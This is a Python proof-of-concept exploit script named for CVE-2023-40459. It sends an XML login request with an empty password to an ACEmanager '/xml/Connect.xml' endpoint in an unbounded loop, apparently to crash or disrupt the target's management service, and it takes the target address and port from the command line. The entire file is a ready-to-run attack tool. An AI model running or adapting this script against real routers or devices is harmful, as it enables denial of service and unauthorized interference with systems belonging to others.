PoC-CVE-2023-40459.py

import requests
import signal
import readchar
import sys


exceptions = list()


def exploit(__address, __port):  
    data = b"""
<request xmlns="urn:acemanager">  
    <connect>  
        <login>test</login>  
        <password></password>  
    </connect>  
</request>
    """

    while True:
        print("-----")

        try:
            response = requests.post(f"{__address}:{__port}/xml/Connect.xml", data=data)
        except:
            print(f"[*] Failed to send request")
        try:
            print(f"status: {response.text} response: {response.text}")
        except:
            print(f"status: No response!")

        print("\n          ---------------------        \n")


def handler(signum, frame):
    msg = "Ctrl-c was pressed. Do you really want to exit? y/n "
    print(msg, end="", flush=True)
    res = readchar.readchar()
    if res == 'y':
        exit(1)
    else:
        print("", end="\r", flush=True)
        print(" " * len(msg), end="", flush=True)
        print("    ", end="\r", flush=True)


def main():  
    signal.signal(signal.SIGINT, handler)
    
    if len(sys.argv) < 3 or len(sys.argv) > 3:
        print(f"Usage : {sys.argv[0]} [address] [port]")
        sys.exit(0)

    address = sys.argv[1]
    port = sys.argv[2]

    exploit(address, port)


if __name__ == "__main__":  
    main()